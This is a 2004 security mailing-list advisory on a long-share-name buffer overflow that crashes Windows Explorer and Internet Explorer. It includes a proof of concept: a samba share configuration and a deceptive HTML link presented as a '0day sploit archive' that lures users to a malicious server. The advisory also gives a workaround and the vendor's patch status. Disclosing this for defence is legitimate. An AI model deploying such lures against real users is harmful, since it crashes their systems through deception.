[NT] Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 04/26/04
- Previous message: SecuriTeam: "[EXPL] Windows Lsasrv.dll RPC Buffer Overflow (MS04-011)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 26 Apr 2004 12:47:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
------------------------------------------------------------------------
SUMMARY
MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are core
pieces of Microsoft Windows Operating Systems. An unchecked buffer allows
a malicious user to crash Microsoft Explorer by creating a long shared
directory name, and convincing the user to access it.
DETAILS
Vulnerable Systems:
MS Internet Explorer, MS Explorer (explorer.exe) on Platforms:
* Windows XP(All), Windows 2000(All), Windows 98(All), Windows ME(All)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to
connect to a malicious server that contains a share name equal or longer
than 300 characters.
Proof of Concept:
Windows will not allow you to create such a long share, but of course
samba includes the feature. After your samba box is up and running create
a share in your smb.conf:
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
After your server is up, just get to your windows test box and get to the
start menu > run > \\your.malicious.server.ip.
Plufff, explorer will crash.
Or By Social Engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive
l/p:n0ph33r</a>
Workaround:
From your network card settings disable the Client for Microsoft networks
until an official fix for this vulnerability is available.
Vendor Status:
Rodrigo Gutierrez notified the vendor in the beginning of 2002, this
vulnerability was supposed to be fixed in Windows XP service pack 1 in XP
and Windows 2000 SP4 according to the vendors knowledge base article
<http://support.microsoft.com/default.aspx?scid=kb;en-us;322857> 322857.
ADDITIONAL INFORMATION
The information has been provided by <mailto:rodrigo@intellicomp.cl>
Rodrigo Gutierrez.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Windows Lsasrv.dll RPC Buffer Overflow (MS04-011)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
